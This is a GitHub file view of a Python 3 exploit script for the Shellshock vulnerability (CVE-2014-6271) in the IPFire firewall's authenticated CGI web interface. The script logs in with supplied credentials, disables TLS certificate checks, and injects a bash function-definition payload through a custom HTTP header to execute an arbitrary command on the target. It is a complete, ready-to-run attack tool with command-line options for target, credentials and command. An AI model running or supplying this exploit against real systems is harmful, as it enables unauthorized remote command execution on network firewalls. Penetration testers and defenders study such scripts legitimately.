-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathIPFire.py
84 lines (74 loc) · 2.96 KB
/
IPFire.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
#!/usr/bin/python3
# IPFire authenticated cgi Remote Command Injection (ShellShock)
# Original exploit author : Claudio Viviani
# Vendor homepage : http://www.ipfire.org
# Software link: http://downloads.ipfire.org/releases/ipfire-2.x/2.15-core82/ipfire-2.15.i586-full-core82.iso
# Vulnerability: IPFire <= 2.15 core 82 Cgi Web Interface suffers from Authenticated Bash Environment Variable Code Injection
# (CVE-2014-6271)
import requests
from requests.auth import HTTPBasicAuth
import optparse
import sys
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
requests.packages.urllib3.disable_warnings()
banner = """
--------------------------
| ipfire authenticated rce |
| CVE-2014-6271 |
| updated for Python3 |
| infiltrating.computer |
--------------------------
"""
# Check url
def checkurl(url):
if url[:8] != "https://" and url[:7] != "http://":
print('[X] Please provide http:// or https:// url')
sys.exit(1)
else:
return url
def connectionScan(url,user,pwd,cmd):
print('[+] Connection in progress...')
s = requests.Session()
response = s.get(url, verify=False)
if response.status_code == 401:
headers = {'VULN' : '() {{ :;}}; echo "InjectionTEST"; /bin/bash -c \'{}\''.format(cmd)}
print('[+] Authentication in progress...')
response = requests.get(url, verify=False, auth=HTTPBasicAuth(user, pwd))
if b"ipfire" in response.content:
print('[+] Username & Password: OK')
print('[+] Checking for vulnerability...')
response = requests.get(url, verify=False, auth=HTTPBasicAuth(user, pwd), headers=headers)
if b"InjectionTEST" in response.content:
print('[!] Command "'+cmd+'": executed!')
else:
print('[X] Not Vulnerable :(')
elif b"401 Authorization Required" in response.content:
print('[X] Incorrect credentials provided')
else:
print('[X] No IPFire page found')
commandList = optparse.OptionParser('usage: %prog -t https://IPADDRESS:444/ -u username -p pass -c "touch /tmp/rce"')
commandList.add_option('-t', '--target', action="store",
help="Insert TARGET URL",
)
commandList.add_option('-c', '--cmd', action="store",
help="Insert command to execute",
)
commandList.add_option('-u', '--user', action="store",
help="Insert username",
)
commandList.add_option('-p', '--pwd', action="store",
help="Insert password",
)
options, remainder = commandList.parse_args()
# Check args
if not options.target or not options.cmd or not options.user or not options.pwd:
print(banner)
commandList.print_help()
sys.exit(1)
print(banner)
url = checkurl(options.target)
cmd = options.cmd
user = options.user
pwd = options.pwd
connectionScan(url,user,pwd,cmd)